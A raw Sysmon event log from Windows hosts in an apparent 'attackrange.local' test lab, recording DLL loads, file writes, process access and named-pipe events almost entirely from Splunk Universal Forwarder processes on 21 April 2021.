19:18:31.587{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33D8CCE53265152D5EE4ABD008F7A0E9,SHA256=6624F11DA153E434E91F8C39C3A2F7676ED4AD3F600526AA95ACB413F3CDDAA4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095242Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:31.511{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095241Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:31.511{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095240Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:31.120{761B69BB-8200-607D-A100-00000000BA01}4148NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=E21F5C2105D3482548EE1DCEAA8E3F18,SHA256=A62C5AB5FD16B72845400EE5338C4D5D0AC27884510730AA80A58BEA4A9B021E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095239Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:31.114{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81B3AA77FA4413BAAEF0FDFDEAD96635,SHA256=67246BD4B0CD2172B45887641E4DA523C0BDB61AB97772E813224FE79801BCC3,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606309Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.345{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606308Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.345{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A992983BA1444CDA308205CE21378C5,SHA256=5DE711B233BFAC8906AC846969769A56FE8614704780255EBB4B12E90A9FE1F6falsefalse - insufficient disk space 534500x80000000000000001606307Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.176{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001606306Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.176{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x80000000000000001606305Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.176{21761711-7A87-6080-C460-00000000BB01}34525212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606304Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.176{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001606303Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.176{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001606302Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.060{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001606301Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001606300Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001606299Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001606298Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001606297Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001606296Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001606295Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001606294Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001606293Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001606292Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001606291Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001606290Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001606289Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001606288Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001606287Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001606286Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001606285Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001606284Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001606283Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001606282Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001606281Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001606280Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001606279Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001606278Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001606277Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001606276Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001606275Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001606274Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001606273Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001606272Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001606271Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001606270Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001606269Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001606268Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001606267Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001606266Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 10341000x80000000000000001606265Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606264Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001606263Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.044{21761711-7A87-6080-C460-00000000BB01}3452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001606262Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 